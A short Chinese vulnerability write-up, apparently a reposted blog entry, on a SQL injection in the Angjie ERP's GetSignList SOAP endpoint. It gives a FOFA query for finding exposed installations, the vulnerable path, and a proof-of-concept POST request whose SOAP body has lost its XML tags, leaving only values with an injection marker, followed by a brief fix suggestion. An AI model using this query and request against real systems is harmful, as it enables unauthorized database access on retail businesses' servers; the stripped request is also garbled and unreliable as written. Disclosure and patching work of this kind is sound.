昂捷-ERP GetSignList sql注入

介绍:

昂捷信息,以软件开发为核心,聚焦于零售行业数字化赋能,为超市、便利店、百货、购物中心、专营专卖等各零售业态提供全面的数字化解决方案和咨询服务,是业界领先的全链路数字化解决方案服务商,旗下的办公自动化管理信息系统存在SQL漏洞

FOFA

FOFA语句:body="CheckSilverlightInstalled"

漏洞复现:

接口:/EnjoyRMIS_WS/WS/OA/CWSOffice.asmx?op=GetSignList

POC:

POST /EnjoyRMIS_WS/WS/OA/CWSOffice.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetSignList"



  
    
      1*
      2
      3
    
  

昂捷-ERP GetSignList sql注入_第1张图片

修复建议

关闭互联网暴露面,过滤敏感字符。

打补丁或升级至安全版本 

你可能感兴趣的:(安全,web安全,mysql)